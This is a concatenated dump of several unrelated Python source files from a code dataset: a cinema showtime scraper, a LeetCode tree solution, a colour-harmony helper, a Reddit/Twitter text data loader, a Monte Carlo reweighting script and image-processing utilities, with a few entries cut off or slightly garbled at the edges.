print(\"INSIDE INSIDE INSIDE...\")\n print(e)\n pass\n except ConnectionError:\n print(\"Connection error...\")\n print(\"break...\")\n pass\n\n\nasync def get_showtimes_by_date(session: aiohttp.ClientSession, movie, date: datetime.date, code) -> List:\n showtimes = []\n params = {\n \"movieId\": movie[2],\n \"date\": date.strftime(\"%Y-%m-%d\"),\n \"cinemas\": code\n }\n url = urllib.parse.urljoin(MAIN_PAGE, \"MovieDetails/GetMovieShowTimes\")\n response = await post_request(session, url, params=params)\n # with open('/Users/n.purushottam.lagad/Downloads/reel_show.txt','w') as file:\n # file.write(html)\n response_json = json.loads(response)\n soup = BeautifulSoup(response_json, \"lxml\")\n if \"No Schedules found\" in response:\n return []\n\n a = soup.find_all('a')\n for a_tag in a:\n if a_tag.get(\"onclick\"):\n magic_string = re.search(r'\"([^\"]*)\"', a_tag.get(\"onclick\")).group(1)\n elif a_tag.get(\"href\"):\n magic_string = a_tag.get(\"href\").split(\"','\")[6]\n else:\n raise ValueError(\"Showtime parsing error. Unexpected html\")\n\n showtime = a_tag.find('div', class_='showtime').text\n print('magic_string:', magic_string)\n print('showtime:', showtime)\n print('---')\n # time_obj = datetime.strptime(time_a, \"%I:%M %p\").time()\n # url = urllib.parse.urljoin(MAIN_PAGE, time_a.get(\"href\"))\n # datetime_obj = datetime.combine(date, time_obj)\n movie_name = movie[0]\n movie_language = movie[3]\n if params['cinemas'] == '0001':\n cinema_title = 'The Dubai Mall'\n if params['cinemas'] == '0002':\n cinema_title = 'Dubai Marina Mall'\n if params['cinemas'] == '0006':\n cinema_title = 'The Springs Souk'\n print(f\"{movie_name}--{cinema_title}--{showtime}\")\n country = MAIN_PAGE.split(\"/\")[3]\n current_date = date.today()\n scraping_date = datetime.now().strftime('%Y%m%d %H:%M')\n processing_date = current_date.strftime(\"%Y%m%d\")\n\n total = [country, movie_name, cinema_title, showtime, scraping_date, processing_date,\n magic_string, movie_language]\n print(total)\n showtimes.append(total)\n return showtimes\n\n\nasync def get_movie_showtimes(session: aiohttp.ClientSession, movie, query_date_str: str):\n movie_html = await get_html(session, movie[1])\n # with open('/Users/n.purushottam.lagad/Downloads/reel_movie_show.txt','w') as file:\n # file.write(movie_html)\n soup = BeautifulSoup(movie_html, \"lxml\")\n # language_id = soup.find(\"input\", {\"id\": \"SelectedLanguageId\"}).get(\"value\")\n # movie = movie._replace(language_id=language_id)\n\n available_date_items = soup.findAll(\"div\", class_=\"dboxelement\")\n showtimes = []\n cinema_code = ['0001', '0002', '0006']\n for date_item in available_date_items:\n date_str = date_item.get('id')\n if date_str != query_date_str:\n continue\n date_obj = datetime.strptime(date_str, \"%Y-%m-%d\").date()\n for code in cinema_code:\n showtimes += await get_showtimes_by_date(session, movie, date_obj, code)\n logging.info(f\"Received {len(showtimes)} showtimes for {movie[0]}\")\n return showtimes\n\n\nasync def get_all_showtimes(session: aiohttp.ClientSession,\n movies,\n date_str: str): ## create separate task for each movie to get showtimes\n tasks = []\n for movie in movies:\n task = asyncio.create_task(get_movie_showtimes(session, movie, date_str))\n tasks.append(task)\n showtimes = await asyncio.gather(*tasks)\n results = []\n for showtime in showtimes:\n results += showtime\n logging.info(f\"Summary received {len(results)} showtimes.\")\n return results\n\n\nasync def get_all_seats(movie_showtimes):\n tasks = []\n for show in movie_showtimes:\n task = asyncio.create_task(get_seats(show))\n tasks.append(task)\n showtimes = await asyncio.gather(*tasks)\n results = []\n for showtime in showtimes:\n results += showtime\n logging.info(f\"Summary received {len(results)} showtimes in final layer.\")\n return results\n\n\nasync def main(date_str):\n connector = aiohttp.TCPConnector(force_close=True, limit=TCPCONNECTOR_LIMIT)\n timeout = aiohttp.ClientTimeout(total=SESSION_TIMEOUT_SEC)\n async with aiohttp.ClientSession(connector=connector, headers=HEADERS, timeout=timeout) as session:\n # total_movies = []\n # start_time = time.time()\n # asp_net_cookie = get_asp_net_cookie()\n movies = await get_movies(session)\n movie_showtimes = await get_all_showtimes(session, movies, date_str)\n movie_seats = await get_all_seats(movie_showtimes)\n\n return movie_seats\n # df1 = pd.DataFrame(data=movie_seats,\n # columns=['country', 'movie_name', 'cinema_title', 'show_time', 'seats_area', 'seats_total',\n # 'seats_sold', 'experience', 'ticket_prices', 'scraping_date',\n # 'processing_date', 'movie_language'])\n # df1.to_csv(\"reel_final5.csv\")\n\n\ndef calling_main(date_str):\n showtimes = asyncio.new_event_loop()\n showtimes = showtimes.run_until_complete(main(date_str))\n\n\ndef save_to_django_db(task: ScraperTask):\n logging.info(f\"Start task for {task.cinema_provider.name} {task.id}\")\n search_date_str = task.date_query.strftime(\"%Y-%m-%d\")\n showtimes = asyncio.run(main(search_date_str))\n\n for showtime in showtimes:\n country, created = Country.objects.get_or_create(name=showtime[0])\n cinema, created = Cinema.objects.get_or_create(name=showtime[2], country=country)\n movie, created = DjangoMovie.objects.get_or_create(name=showtime[1], language=showtime[11])\n\n showtime_time_obj = datetime.strptime(showtime[3], '%I:%M %p')\n showtime_datetime_obj = datetime.combine(task.date_query, showtime_time_obj.time())\n ShowtimeSeats.objects.create(\n task=task,\n cinema=cinema,\n movie=movie,\n datetime=showtime_datetime_obj,\n experience=showtime[7],\n all=showtime[5],\n sold=showtime[6],\n price=showtime[8],\n area=showtime[4],\n )\n","repo_name":"LopatKing/cinema-scrapers","sub_path":"django/scrapers/reelcinema.py","file_name":"reelcinema.py","file_ext":"py","file_size_in_byte":16603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7428325483","text":"# LeetCode imports\nfrom LeetCode.GlobalStructures import TreeNode\nfrom typing import Optional\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution:\n def maximumAverageSubtree(self, root: Optional[TreeNode]) -> float:\n '''\n Initial and Optimal\n '''\n max_avg = 0\n \n def AvgUsingDFS(node):\n nonlocal max_avg\n \n if not node:\n return 0, 0\n \n left_count, left_sum = AvgUsingDFS(node.left)\n right_count, right_sum = AvgUsingDFS(node.right)\n curr_count = left_count + 1 + right_count\n curr_sum = left_sum + node.val + right_sum\n \n max_avg = max(max_avg, curr_sum / curr_count)\n return curr_count, curr_sum\n \n AvgUsingDFS(root)\n return max_avg","repo_name":"PyroGenesis/Comprehensive-Coding-Solutions","sub_path":"LeetCode/1120-Maximum-Average-Subtree.py","file_name":"1120-Maximum-Average-Subtree.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29999432047","text":"\ndef colour_harmony(anchor, c):\n colours=[\"red\",\"red-orange\",\"orange\",\"yellow-orange\",\"yellow\",\"yellow-green\"]\n colours+=[\"green\",\"blue-green\",\"blue\",\"blue-violet\",\"violet\",\"red-violet\"]\n \n combs = {}\n combs[\"complementary\"] = [0,6]\n combs[\"analogous\"] = [0,1,-1]\n combs[\"split_complementary\"] = [0,5,-5]\n combs[\"triadic\"] = [0,4,-4]\n combs[\"rectangle\"] = [0,2,6,-4]\n combs[\"square\"] = [0,3,6,-3]\n \n r = colours.index(anchor)\n return {colours[(r+i)%12] for i in combs[c]}\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"md4AF8HwJrhrhA5zm_10.py","file_name":"md4AF8HwJrhrhA5zm_10.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1741105788","text":"## Vocab Primer\nimport os\nimport sys\nimport nltk\nfrom nltk import word_tokenize\nnltk.download('punkt')\nfrom tqdm import tqdm\nimport torch\nimport pandas as pd\nfrom pandas.tseries.offsets import BDay\nfrom datetime import datetime, timedelta, date\n\n\n\nfrom scipy.sparse import csr_matrix\nimport numpy as np\nfrom collections import Counter\nimport matplotlib.pyplot as plt\n\n\nclass Vocab():\n\tdef __init__(self):\n\t\tself.locked = False\n\t\tself.nextID = 0\n\t\tself.word2id = {}\n\t\tself.id2word = {}\n\n\tdef get_id(self, word):\n\t\tif not word in self.word2id:\n\t\t\tif self.locked:\n\t\t\t\treturn -1 \t# UNK token\n\t\t\telse:\n\t\t\t\tself.word2id[word] = self.nextID\n\t\t\t\tself.id2word[self.word2id[word]] = word\n\t\t\t\tself.nextID += 1\n\t\treturn self.word2id[word]\n\n\tdef has_word(self, word):\n\t\treturn self.word2id.has_key(word)\n\n\tdef has_id(self, wid):\n\t\treturn self.word2.has_key(wid)\n\n\tdef get_word(self, wid):\n\t\treturn self.id2word[wid]\n\n\tdef save_vocab(self, vocabFile):\n\t\tfOut = open(vocabFile, 'w')\n\t\tfor word in self.word2id.keys():\n\t\t\tfOut.write(\"%s\\t%s\\n\" % (word, self.word2id[word]))\n\n\tdef get_vocab_size(self):\n\t\t#return self.nextId-1\n\t\treturn self.nextID\n\n\tdef get_words(self):\n\t\treturn self.word2id.keys()\n\n\tdef lock(self):\n\t\tself.locked = True\n\ndef create_vocab(wsb_data):\n vocab = Vocab()\n for item in wsb_data:\n tokenized_item = word_tokenize(item)\n for word in tokenized_item:\n id = vocab.get_id(word.lower())\n vocab.lock()\n return vocab\n\ndef load_csv(csv_file_path, type_=None):\n\tif type_ == \"reddit\" or type_ == None:\n\t\tdata = pd.read_csv(csv_file_path, delimiter=\",\")\n\t\tdata = data[[\"title\", \"score\", \"comms_num\", \"timestamp\"]]\n\n\tif type_ == \"twitter\":\n\t\tdata = pd.read_csv(csv_file_path, delimiter=\",\")\n\n\treturn data\n\n\nclass WSBData():\n\tdef __init__(self, csv_file_path, dataframe=None, vocab=None, train=True):\n\t\t\"\"\" Reads in data into sparse matrix format \"\"\"\n\t\tif not vocab:\n\t\t\tself.vocab = Vocab()\n\t\telse:\n\t\t\tself.vocab = vocab\n\n\t\tif dataframe is not None:\n\t\t\tself.dataframe = dataframe\n\t\telse:\n\t\t\tself.dataframe = pd.read_csv(csv_file_path)\n\n\t\trows = self.dataframe.shape[0]\n\t\tself.lowest_bound = -999999\n\t\tself.get_stats_wsb()\n\n\t\t# if train:\n\t\t# \tdataframe = dataframe.iloc[rows//4:, :]\n\t\t# else:\n\t\t# \tdataframe = dataframe.iloc[:rows//4, :]\n\n\t\t#For csr_matrix (see http://docs.scipy.org/doc/scipy-0.15.1/reference/generated/scipy.sparse.csr_matrix.html#scipy.sparse.csr_matrix)\n\t\tX_values = []\n\t\tX_row_indices = []\n\t\tX_col_indices = []\n\t\tY = []\n\n\t\tXwordList = []\n\t\tXfileList = []\n\n\t\t#Read entries\n\t\tfor i in tqdm(range(len(dataframe))):\n\t\t\trow = dataframe.iloc[i, :]\n\t\t\ttitle = row[0]\n\t\t\twordlist = []\n\t\t\ttokenized_title = word_tokenize(title)\n\t\t\tfor w in tokenized_title:\n\t\t\t\tid = self.vocab.get_id(w.lower())\n\t\t\t\tif id >= 0:\n\t\t\t\t\twordlist.append(id)\n\n\t\t\t# wordList = [self.vocab.get_id(w.lower()) for w in word_tokenize(title) if self.vocab.get_id(w.lower()) >= 0]\n\t\t\tif len(wordlist) == 0:\n\t\t\t\tcontinue\n\t\t\tXwordList.append(wordlist)\n\t\t\tXfileList.append(row[0])\n\t\t\twordCounts = Counter(wordlist)\n\t\t\tfor (wordId, count) in wordCounts.items():\n\t\t\t\tif wordId >= 0:\n\t\t\t\t\tX_row_indices.append(len(row[0])+i)\n\t\t\t\t\tX_col_indices.append(wordId)\n\t\t\t\t\tX_values.append(count)\n\n\t\t\tsentiment_value = self.sentiment_function(row)\n\n\t\t\tif sentiment_value == \"very-bearish\":\n\t\t\t\tY.append(0)\n\t\t\telif sentiment_value == \"bearish\":\n\t\t\t\tY.append(1)\n\t\t\telif sentiment_value == \"neutral\":\n\t\t\t\tY.append(2)\n\t\t\telif sentiment_value == \"bullish\":\n\t\t\t\tY.append(3)\n\t\t\telif sentiment_value == \"very-bullish\":\n\t\t\t\tY.append(4)\n\n\n\t\tself.vocab.lock()\n\n\t\t#Create a sparse matrix in csr format\n\t\t# self.X = csr_matrix((X_values, (X_row_indices, X_col_indices)), shape=(max(X_row_indices)+1, self.vocab.get_vocab_size()))\n\t\tself.Y = np.asarray(Y)\n\t\tprint(self.Y.shape)\n\t\tprint(len(XwordList))\n\t\t#Randomly shuffle\n\t\tindex = np.arange(len(XwordList))\n\t\t# print(self.X.shape)\n\t\t# index = np.arange(self.X.shape[0])\n\t\tnp.random.shuffle(index)\n\t\t# self.X = self.X[index,:]\n\t\tself.XwordList = [torch.LongTensor(XwordList[i]) for i in index] #Two different sparse formats, csr and lists of IDs (XwordList).\n\t\tself.XfileList = [XfileList[i] for i in index]\n\t\tself.Y = self.Y[index]\n\n\n\tdef sentiment_function(self, df_row):\n\t\t# import pdb; pdb.set_trace()\n\t\tscore = df_row[1]\n\t\tcomments = df_row[2]\n\n\n\t\tscore = np.log(score + 0.00001)\n\t\tcomments = np.log(comments + 0.00001)\n\n\t\ttheta1 = 0.50\n\t\ttheta2 = 0.50\n\n\t\tsentiment = theta1*score + theta2*comments\n\t\t# import pdb; pdb.set_trace()\n\t\tbound1, bound2, bound3, bound4, bound5 = tuple(self.func_percentiles)\n\t\t# know i could have just made it return a number, but thought\n\t\t# i'd keep it string match to get a general concept across\n\t\tif sentiment >= bound1 and sentiment < bound2:\n\t\t\treturn 'bearish'\n\t\telif sentiment >= bound2 and sentiment < bound3:\n\t\t\treturn 'neutral'\n\t\telif sentiment >= bound3 and sentiment < bound4:\n\t\t\treturn 'bullish'\n\t\telif sentiment >= bound4 and sentiment < bound5:\n\t\t\treturn 'very-bullish'\n\t\telse:\n\t\t\treturn \"very-bearish\"\n\n\tdef get_stats_wsb(self, plot=False):\n\t\tscore = self.dataframe.iloc[:, 1].to_numpy()\n\t\tcomments = self.dataframe.iloc[:, 2].to_numpy()\n\n\t\tscore = np.log(score + 0.00001)\n\t\tcomments = np.log(comments + 0.00001)\n\n\n\t\ttheta1 = .50\n\t\ttheta2 = .50\n\t\tfunc = theta1 * score + theta2 * comments\n\t\tself.lowest_bound = func.min()\n\t\tprint(self.lowest_bound)\n\n\n\t\t## all pareto distributions which really shouldn't come as too\n\t\t## much of a surprise --\n\t\tif plot:\n\t\t\thist1 = plt.hist(score, bins=100, range=(0, 500))\n\t\t\thist2 = plt.hist(comments, bins=100, range=(0, 500))\n\t\t\tplt.show()\n\n\t\tscore_percentiles = []\n\t\tcomment_percentiles = []\n\t\tfunc_percentiles = []\n\t\tfor perc in range(0, 100, 20):\n\t\t\ts_perc = np.percentile(score, perc)\n\t\t\tc_perc = np.percentile(comments, perc)\n\t\t\tf_perc = np.percentile(func, perc)\n\t\t\tscore_percentiles.append(s_perc)\n\t\t\tcomment_percentiles.append(c_perc)\n\t\t\tfunc_percentiles.append(f_perc)\n\n\t\tself.score_percentiles = score_percentiles\n\t\tself.comment_percentiles = comment_percentiles\n\t\tself.func_percentiles = func_percentiles\n\t\tprint(self.func_percentiles)\n\n\nclass TwitterData():\n\tdef __init__(self, csv_file_path, dataframe=None, vocab=None, train=True):\n\t\t\"\"\" Reads in data into sparse matrix format \"\"\"\n\t\tif not vocab:\n\t\t\tself.vocab = Vocab()\n\t\telse:\n\t\t\tself.vocab = vocab\n\n\t\tif dataframe is not None:\n\t\t\tself.dataframe = dataframe\n\t\telse:\n\t\t\tself.dataframe = pd.read_csv(csv_file_path)\n\n\n\t\trows = self.dataframe.shape[0]\n\n\t\tX_values = []\n\t\tX_row_indices = []\n\t\tX_col_indices = []\n\t\tY = []\n\n\t\tXwordList = []\n\t\tXfileList = []\n\n\t\t#Read entries\n\t\tfor i in tqdm(range(len(self.dataframe))):\n\t\t\trow = self.dataframe.iloc[i, :]\n\t\t\ttitle = row[0]\n\t\t\twordlist = []\n\t\t\ttokenized_title = word_tokenize(title)\n\t\t\tfor w in tokenized_title:\n\t\t\t\tid = self.vocab.get_id(w.lower())\n\t\t\t\tif id >= 0:\n\t\t\t\t\twordlist.append(id)\n\n\t\t\tif len(wordlist) == 0:\n\t\t\t\tcontinue\n\t\t\tXwordList.append(wordlist)\n\t\t\tXfileList.append(row[0])\n\t\t\twordCounts = Counter(wordlist)\n\t\t\tfor (wordId, count) in wordCounts.items():\n\t\t\t\tif wordId >= 0:\n\t\t\t\t\tX_row_indices.append(len(row[0])+i)\n\t\t\t\t\tX_col_indices.append(wordId)\n\t\t\t\t\tX_values.append(count)\n\n\t\t\tY.append(row[1])\n\n\n\t\tself.vocab.lock()\n\n\t\t#Create a sparse matrix in csr format\n\t\t# self.X = csr_matrix((X_values, (X_row_indices, X_col_indices)), shape=(max(X_row_indices)+1, self.vocab.get_vocab_size()))\n\t\tself.Y = np.asarray(Y)\n\t\tprint(self.Y.shape)\n\t\tprint(len(XwordList))\n\t\t#Randomly shuffle\n\t\tindex = np.arange(len(XwordList))\n\t\t# print(self.X.shape)\n\t\t# index = np.arange(self.X.shape[0])\n\t\tnp.random.shuffle(index)\n\t\t# self.X = self.X[index,:]\n\t\tself.XwordList = [torch.LongTensor(XwordList[i]) for i in index] #Two different sparse formats, csr and lists of IDs (XwordList).\n\t\tself.XfileList = [XfileList[i] for i in index]\n\t\tself.Y = self.Y[index]\n\n\nclass WSBDataLarge():\n\tdef __init__(self, csv_file_path, dataframe=None, vocab=None, train=True):\n\t\t\"\"\" Reads in data into sparse matrix format \"\"\"\n\t\tif not vocab:\n\t\t\tself.vocab = Vocab()\n\t\telse:\n\t\t\tself.vocab = vocab\n\n\t\tif dataframe is not None:\n\t\t\tself.dataframe = dataframe\n\t\telse:\n\t\t\tself.dataframe = pd.read_csv(csv_file_path)\n\n\t\trows = self.dataframe.shape[0]\n\n\t\tstock_df = pd.read_csv(\"../data/GME.csv\")\n\t\tself.stock_price(stock_df)\n\n\n\t\tself.dataframe[\"timestamp\"] = pd.to_datetime(self.dataframe[\"timestamp\"], format='%Y-%m-%d %H:%M:%S')\n\n\t\tisBusinessday = BDay().onOffset\n\t\tmatch_series = self.dataframe[\"timestamp\"].map(isBusinessday)\n\t\tself.dataframe = self.dataframe[match_series].copy()\n\n\t\tX_values = []\n\t\tX_row_indices = []\n\t\tX_col_indices = []\n\t\tY = []\n\n\t\tXwordList = []\n\t\tXfileList = []\n\n\t\t#Read entries\n\t\tfor i in tqdm(range(len(self.dataframe))):\n\t\t\trow = self.dataframe.iloc[i, :]\n\t\t\ttitle = row[0]\n\t\t\twordlist = []\n\t\t\ttokenized_title = word_tokenize(title)\n\t\t\tfor w in tokenized_title:\n\t\t\t\tid = self.vocab.get_id(w.lower())\n\t\t\t\tif id >= 0:\n\t\t\t\t\twordlist.append(id)\n\n\t\t\t# wordList = [self.vocab.get_id(w.lower()) for w in word_tokenize(title) if self.vocab.get_id(w.lower()) >= 0]\n\t\t\tif len(wordlist) == 0:\n\t\t\t\tcontinue\n\t\t\tXwordList.append(wordlist)\n\t\t\tXfileList.append(row[0])\n\t\t\twordCounts = Counter(wordlist)\n\t\t\tfor (wordId, count) in wordCounts.items():\n\t\t\t\tif wordId >= 0:\n\t\t\t\t\tX_row_indices.append(len(row[0])+i)\n\t\t\t\t\tX_col_indices.append(wordId)\n\t\t\t\t\tX_values.append(count)\n\n\t\t\t### Add Y logic\n\n\t\t\treddit_date = row[-1] + timedelta(days=1)\n\t\t\t#reddit_date_mon = row[-1] + timedelta(days=2)\n\t\t\tstr_time = reddit_date.strftime('%m') + '-' + reddit_date.strftime('%d')\n\t\t\t#str_time_mon = reddit_date_mon.strftime('%m') + '-' + reddit_date_mon.strftime('%d')\n\n\n\t\t\t# need to figure out the fix for Friday to Saturday\n\t\t\ttry:\n\t\t\t\tlabel = self.gme_stock_dict[str_time]\n\t\t\t\tY.append(label)\n\t\t\texcept:\n\t\t\t\t#Y.append(self.gme_stock_dict[str_time_mon])\n\t\t\t\tY.append(0)\n\n\n\t\tself.vocab.lock()\n\n\t\t#Create a sparse matrix in csr format\n\t\t# self.X = csr_matrix((X_values, (X_row_indices, X_col_indices)), shape=(max(X_row_indices)+1, self.vocab.get_vocab_size()))\n\n\t\tself.Y = np.asarray(Y)\n\t\tprint(self.Y.shape)\n\t\tprint(len(XwordList))\n\t\t#Randomly shuffle\n\t\tindex = np.arange(len(XwordList))\n\t\t# print(self.X.shape)\n\t\t# index = np.arange(self.X.shape[0])\n\t\tnp.random.shuffle(index)\n\t\t# self.X = self.X[index,:]\n\t\tself.XwordList = [torch.LongTensor(XwordList[i]) for i in index] #Two different sparse formats, csr and lists of IDs (XwordList).\n\t\tself.XfileList = [XfileList[i] for i in index]\n\t\tself.Y = self.Y[index]\n\n\n\tdef stock_price(self, dataframe):\n\t\tdataframe[\"Date\"] = pd.to_datetime(dataframe[\"Date\"], format='%Y-%m-%d %H:%M:%S')\n\t\t# start_date = min(self.dataframe['timestamp']) not working for some reason\n\t\tstart_date = \"2021-01-28 00:00:00\"\n\t\tdf = dataframe[[\"Date\", \"Open\", \"Close\", \"High\"]]\n\t\tdf = df[df[\"Date\"] >= start_date]\n\t\tdf[\"Date_str\"] = df[\"Date\"].dt.strftime('%m') + '-' + df[\"Date\"].dt.strftime('%d')\n\n\t\tdf['Up_Down'] = np.where((df[\"High\"] - df[\"Open\"]) > 0, 1, 0)\n\n\t\tprint(df.head)\n\t\tself.gme_stock_dict = pd.Series(df['Up_Down'].values, index=df.Date_str)\n\n\n\nif __name__ == '__main__':\n\twsb_file_path = \"../data/reddit_wsb.csv\"\n\twsb_data = load_csv(wsb_file_path)\n\tvocab = create_vocab(wsb_data['title'].values)\n\n\tsplit_point = int(len(wsb_data)*0.9)\n\ttrain_df = wsb_data[0:split_point]\n\tdev_df = wsb_data[split_point:]\n\tprint(train_df)\n\n\tprint(\"load train data\")\n\ttrain_data = WSBDataLarge(wsb_file_path, dataframe=train_df, vocab=vocab, train=True)\n\tdev_data = WSBDataLarge(wsb_file_path, dataframe=dev_df, vocab=vocab, train=False)\n\tdev_labels = dev_data.Y\n\tdev_unique, dev_counts = np.unique(dev_labels, return_counts=True)\n\n\tlabels = train_data.Y\n\tunique_labels, counts = np.unique(labels, return_counts=True)\n\tprint(unique_labels)\n\tprint(counts)\n\tplt.figure()\n\tplt.bar(unique_labels, counts)\n\t# plt.hist(labels, bins=5)\n\tplt.title(\"WSB Training Data Derived Class Distribution\")\n\tplt.xlabel(\"Classes\")\n\tplt.ylabel(\"Frequency\")\n\tplt.show()\n\n\tplt.figure(1)\n\tplt.bar(dev_unique, dev_counts)\n\t# plt.hist(labels, bins=5)\n\tplt.title(\"WSB Eval Data Derived Class Distribution\")\n\tplt.xlabel(\"Classes\")\n\tplt.ylabel(\"Frequency\")\n\tplt.show()\n\t# test = WSBDataLarge(\"../data/reddit_data.csv\")\n","repo_name":"ctyler9/natural-language-spring-2021","sub_path":"model/vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":12117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"17161748857","text":"#!/usr/bin/env python\nimport os\nimport argparse\nimport json\nimport time\n\nimport numpy as np\n\nfrom libspi.Genome import *\nfrom libspi.MonteCarloSampler import *\nimport libspi.IO as IO\nimport libspi.CommandLineUtils as cli\n\n##############################################################\n# CMD line options parser\n##############################################################\n\n\ndef parse_command_line_options():\n parser = argparse.ArgumentParser(\n description='Monte Carlo reweighting for Cre-Lox Recombination studies.')\n parser.add_argument('--input-file', '-i', type=str,\n help=\"Chromosome file structure. Chromosome is assumed to be circular.\")\n parser.add_argument('--output-file', '-o', type=str,\n required=True, help=\"Output file\")\n parser.add_argument('--trajectory-file', '-t', type=str,\n required=True, help=\"Trajectory file\")\n # parser.add_argument('--config', '-c', type=str, required=True, help=\"Simulation configuration file\")\n parser.add_argument('--lb', type=float, required=True,\n help=\"Lambda parameter\")\n parser.add_argument('--nu', type=float, required=True, help=\"Nu parameter\")\n parser.add_argument('--b', type=float, required=True, help=\"B parameter\")\n parser.add_argument('--rl', type=float, required=True,\n help=\"Reweighting radius for lambda parameter\")\n parser.add_argument('--rnu', type=float, required=True,\n help=\"Reweighting radius for nu parameter\")\n parser.add_argument('--rb', type=float, required=True,\n help=\"Reweighting radius for b parameter\")\n options = parser.parse_args()\n return options\n\n\n##############################################################\n# MAIN method\n##############################################################\nif __name__ == \"__main__\":\n #\n options = parse_command_line_options()\n # config = cli.load_configuration_file(options.config)\n\n # building the parameters grid\n # param_grid = cli.build_parameters_grid(config)\n param_grid = [(options.lb, options.nu, options.b)]\n\n print(\"Using %d parameters settings.\" % len(param_grid))\n\n # creating and loading genome structure file\n genome = Genome()\n genome.load_genome_from_file(options.input_file)\n\n # loading trajectory pool\n trajectory_pool = IO.load_trajectories_from_file(options.trajectory_file)\n filtered_pool = dict()\n\n for curr_param, curr_traj in trajectory_pool.items():\n c_l, c_nu, c_b = curr_param\n if (np.abs(c_l - options.lb) <= options.rl) and \\\n (np.abs(c_nu - options.nu) <= options.rnu) and \\\n (np.abs(c_b - options.b) <= options.rb):\n filtered_pool[curr_param] = curr_traj\n\n print(\"Reweighting using %d simulations.\" % len(filtered_pool.keys()))\n # creating the MC sampler\n mc = ReweightGridMonteCarloSampler(genome)\n\n # running and timing the sampler\n # t_start = time.time()\n trajectory_profile = mc.run(filtered_pool, param_grid)\n # t_elapsed = time.time() - t_start\n\n # saving objects to file\n IO.save_profiles_to_file(\n options.output_file, trajectory_profile, vars(options))\n","repo_name":"stracquadaniolab/spi-nf","sub_path":"bin/spi-reweight.py","file_name":"spi-reweight.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"75069214170","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 08 10:15:52 2016\n\n@author: yimeng\n\"\"\"\n\nimport math, os, cv2, shutil\nimport numpy as np\n\ndef dp(InputCost):\n # dynamic programming \n\n weight_smooth = 2\n edge = np.ones(InputCost.shape[1])\n paths = np.ones(InputCost.shape[0]) \n backtracing = np.ones(InputCost.shape)\n CAM = copy.deepcopy(InputCost) # cost accumulate matrix\n \n for i in range(1, InputCost.shape[1]):\n for j in range(InputCost.shape[0]):\n for k in range(InputCost.shape[0]):\n paths[k] = weight_smooth*np.absolute(j-k) + CAM[k, i-1] + CAM[j, i]\n \n CAM[j,i] = paths.min() \n backtracing[j,i] = paths.argmin()\n \n edge[-1] = CAM[:,-1].argmin()\n \n for i in range(InputCost.shape[1]-2, -1, -1):\n edge[i] = backtracing[int(edge[i+1]), i+1]\n \n return edge\n \ndef openning(inputmatrix, wind_size = (3,3)):\n # mathematical morphology: openning\n \n kernel = np.ones(wind_size, np.uint8)\n erosion = cv2.erode(inputmatrix, kernel)\n dilation = cv2.dilate(erosion, kernel)\n return dilation\n \ndef closing(inputmatrix, wind_size = (3,3)):\n # mathematical morphology: closing\n \n kernel = np.ones(wind_size, np.uint8)\n dilation = cv2.dilate(inputmatrix, kernel)\n erosion = cv2.erode(dilation, kernel)\n return erosion\n \ndef normalize_std(data):\n # standard normalize\n data_mean = data.mean(axis = 0)\n data_std = data.std(axis = 0) \n data_std[data_std == 0] = 1 \n return (data - data_mean)/data_std, data_mean, data_std \n \ndef relativeDistance(inputdata):\n temp_data = np.vstack((inputdata[0], inputdata[1]))\n\n dist = 0\n for i in range(len(inputdata[0])):\n for j in range(len(inputdata[0])):\n if i!= j:\n dist += np.sqrt((temp_data[0,i] - temp_data[0,j])**2 + (temp_data[1,i] - temp_data[1,j])**2)\n \n return dist\n \ndef zeropadding(matrix, padsize1, padsize2, constant_val = 0):\n leftPad,rightPad,topPad,bottomPad = padsize1, padsize1, padsize2, padsize2\n pads = ((leftPad,rightPad),(topPad,bottomPad))\n return np.pad(matrix, pads, 'constant', constant_values = constant_val)\n\ndef NonMaximumSuppression(labelmap,scoremap,suppresssize):\n finallabel = np.zeros((0,4))\n mapshape = np.array([scoremap.shape[0:2]])\n while (scoremap>0).any():\n index = scoremap.argmax()\n index = np.array([index/mapshape[0,1],index%mapshape[0,1]])\n singlelabel = np.array([[labelmap[index[0],index[1]],scoremap[index[0],index[1]],index[0],index[1]]])\n finallabel = np.concatenate((finallabel,singlelabel),0)\n suppressedLoc = np.array([0,0,mapshape[0,0],mapshape[0,1]])\n if index[0]-suppresssize>0:\n suppressedLoc[0] = index[0]-suppresssize\n if index[0]+suppresssize0:\n suppressedLoc[1] = index[1]-suppresssize\n if index[1]+suppresssize 60:\n add_hr += (min_24hr + duration_minutes_org)//60\n duration_hour = duration_hour_org + add_hr\n duration_minutes = (min_24hr + duration_minutes_org) - (add_hr*60)\n else:\n duration_hour = duration_hour_org\n duration_minutes = duration_minutes_org\n \n if (hour_24hr + duration_hour) > 24:\n cal_nextday += (hour_24hr + duration_hour)//24\n \n #Calculate display day of week\n if str(dayofwk).capitalize() in dayofweek:\n next_day = \"\"\n cal_dow = None\n\n if cal_nextday == 0:\n str_nextday = \", \" + str(dayofwk.capitalize())\n else:\n if (dayofweek[str(dayofwk).capitalize()] + cal_nextday) > 7:\n cal_dow = (dayofweek[str(dayofwk).capitalize()] + cal_nextday)%7\n else:\n cal_dow = dayofweek[str(dayofwk).capitalize()] + cal_nextday\n \n next_day = [k for k, v in dayofweek.items() if v == cal_dow][0]\n \n if cal_nextday == 1:\n str_nextday = \", \" + next_day + \" (next day)\"\n else:\n str_nextday = \", \" + next_day + \" (\" + str(cal_nextday) +\" days later)\"\n \n #calculate new_time\n cal_time = start_time + timedelta(minutes=duration_minutes_org, hours=duration_hour_org)\n \n #Show output\n if dayofwk == None:\n if cal_nextday == 1:\n new_time = cal_time.time().strftime('%-I:%M %p') + \" (next day)\"\n elif 